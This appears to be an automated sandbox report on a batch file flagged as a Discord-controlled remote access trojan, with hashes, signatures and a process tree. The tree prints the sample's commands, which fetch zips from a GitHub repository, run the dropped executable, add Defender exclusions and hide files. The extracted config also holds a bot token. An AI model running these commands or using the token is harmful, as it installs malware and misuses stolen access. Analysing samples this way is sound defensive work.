Analysis
-
max time kernel
1751s -
max time network
1165s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 17:22
Static task
static1
Behavioral task
behavioral1
Sample
asd.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
asd.bat
Resource
win10v2004-20241007-en
General
-
Target
asd.bat
-
Size
1KB
-
MD5
0dababeef5a7a86809d847382772d821
-
SHA1
612be301ee1bc7a422f79b2d17822ee2244efc4c
-
SHA256
56af74c6f17f1e987ace45d8ec180ed38d221f2fdfe9d601bdec2d703689bdb4
-
SHA512
1ec9342d34914503dc475fd5fb300cbbb2ace1e9b6e8cc1b9221dd3468eb64a1e0d7f3d0c6f8427207239c61c4b8fb87da89f88f6920b95ef928dd1214d17d6a
Malware Config
Extracted
discordrat
-
discord_token
MTI5Njg5NDEwMjY0NTkwMzQwMA.GffxcT.wWuk4gdi5T-RNzCLfFQ4XgAEMO4ZjpXcRu5E5Y
-
server_id
1293738586679672945
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 13 4956 powershell.exe 20 4956 powershell.exe 29 4156 powershell.exe 30 4156 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1688 powershell.exe 1440 powershell.exe 3524 powershell.exe 1520 powershell.exe 4448 powershell.exe 4956 powershell.exe 4156 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Discord.exepid Process 2904 Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 20 raw.githubusercontent.com 30 raw.githubusercontent.com 19 raw.githubusercontent.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3524 powershell.exe 3524 powershell.exe 4956 powershell.exe 4956 powershell.exe 1520 powershell.exe 1520 powershell.exe 1688 powershell.exe 1688 powershell.exe 1440 powershell.exe 1440 powershell.exe 4448 powershell.exe 4448 powershell.exe 4156 powershell.exe 4156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDiscord.exedescription pid Process Token: SeDebugPrivilege 3524 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 2904 Discord.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid Process procid_target PID 4408 wrote to memory of 3524 4408 cmd.exe 85 PID 4408 wrote to memory of 3524 4408 cmd.exe 85 PID 4408 wrote to memory of 2104 4408 cmd.exe 86 PID 4408 wrote to memory of 2104 4408 cmd.exe 86 PID 4408 wrote to memory of 5096 4408 cmd.exe 87 PID 4408 wrote to memory of 5096 4408 cmd.exe 87 PID 4408 wrote to memory of 4956 4408 cmd.exe 88 PID 4408 wrote to memory of 4956 4408 cmd.exe 88 PID 4408 wrote to memory of 1180 4408 cmd.exe 92 PID 4408 wrote to memory of 1180 4408 cmd.exe 92 PID 4408 wrote to memory of 3548 4408 cmd.exe 93 PID 4408 wrote to memory of 3548 4408 cmd.exe 93 PID 3548 wrote to memory of 1520 3548 cmd.exe 95 PID 3548 wrote to memory of 1520 3548 cmd.exe 95 PID 3548 wrote to memory of 1688 3548 cmd.exe 96 PID 3548 wrote to memory of 1688 3548 cmd.exe 96 PID 3548 wrote to memory of 1440 3548 cmd.exe 99 PID 3548 wrote to memory of 1440 3548 cmd.exe 99 PID 3548 wrote to memory of 2416 3548 cmd.exe 100 PID 3548 wrote to memory of 2416 3548 cmd.exe 100 PID 2416 wrote to memory of 4448 2416 cmd.exe 102 PID 2416 wrote to memory of 4448 2416 cmd.exe 102 PID 2416 wrote to memory of 4156 2416 cmd.exe 103 PID 2416 wrote to memory of 4156 2416 cmd.exe 103 PID 2416 wrote to memory of 2844 2416 cmd.exe 106 PID 2416 wrote to memory of 2844 2416 cmd.exe 106 PID 2416 wrote to memory of 2904 2416 cmd.exe 107 PID 2416 wrote to memory of 2904 2416 cmd.exe 107 PID 2416 wrote to memory of 824 2416 cmd.exe 108 PID 2416 wrote to memory of 824 2416 cmd.exe 108 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 5096 attrib.exe 824 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\asd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2104
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\system32\tar.exetar -xf 1.zip2⤵PID:1180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\system32\tar.exetar -xf Discord.zip4⤵PID:2844
-
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d4⤵
- Views/modifies file attributes
PID:824
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268B
MD5cdb8a5fcca6c6b2ac156c95610dd62b0
SHA1fc9143fbdfc511193d627682d03da517ef03eac0
SHA256c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df
SHA512b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9
-
Filesize
661B
MD515af212f6b388a57510af30146ea51f8
SHA19833f92d882d8e69bd453bdb2f3feda15d961c0f
SHA25662b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897
SHA51290614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05
-
Filesize
327B
MD59cbac74f137243a22af973eacd90de31
SHA13260ea401134322fe037a35b685c66a0793c3658
SHA256567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465
SHA512e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60
-
Filesize
51KB
MD585f1a70f2760fc2b1c9dd2e11d178548
SHA1c92415eb189ebb19efa29a1be6eeea7421d2eabc
SHA2569c3a2642864d1680716134111aa3ce37cf1f99829a4d8301b4972230358389ec
SHA512f5a8e36d502992f733dd5473d6146bd0a1b3f17a7377b62f2f628318cccf9cec236ea6bac268d9a4377ea12cd4d984f4b59553d4c5de2481bcb710f20d5a2aef
-
Filesize
45KB
MD56c33dba78cdd4a159b34c812616bfa6a
SHA18e486a8492e7b782762c08765572da921435a759
SHA2560c92eb7b8f6dcf63ee71137c8f3908382e4d4010e2d3a55b4b8036e86260f47a
SHA512afe6084e6f50fe26796083a293bd79a82c06d42880657c5e9055bb52677d43cbe12a63134c2dae0259c1f6f6f70bd6ea3237f3cd3665f6e0d3118ff70c225581
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD506bfe325c811af601db2ca7e2e4ec83d
SHA1c913e04f043c88b6e09b39ed89e2acb199b4fbf7
SHA25643375a3c26ea4a1c4da26615585a55860bd6a7bc68f5b9666fe1927dc7c91c38
SHA51262c595da5e31f25b32f65895759ec9118bb6d538fdd728b9231d903e2fcd984b315165d799a93695f248cb51385ca5775a24c5fbfd74196d598cbbca40f6e1f6
-
Filesize
64B
MD5eb6332ae9e8fec69c2236355e2638f9d
SHA171500d57fb304979afd6756f06d4b9a59f995eb7
SHA25688e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32
SHA512e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
944B
MD54178a021dab6578724f63a6a72b9b13b
SHA18e5d61c21edaafe4e2257ebe53f9b37b723838b7
SHA256347338241585c510bb1fafae13447879318610ca4d844b0e73089957911d77fe
SHA5120f49991948129415c2a02298072055d4de521e4a8cb9ae887bb2096683668fcb491b99d58fd6e239463a5ac981d756c4b2827cb52c1e1253b9cb114095e140c9
-
Filesize
64B
MD54bdf0cba3f1d2a25792c0515438f96d0
SHA1c0bf913f66774a9d02dcaa3fbe8da42300d4de2d
SHA256481b7faf2bda339609de45ddb8478e44f5f3c9faddd3980d34ff71870cf7e5b7
SHA512232fa80ae3ed45f78fa89f94a193a1f478d21ebe5f61539dc888bfbcc848157cf19262130dbd15537e109fa7512e837fb5be3f9f67a0027e9bb1c68b632575ec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82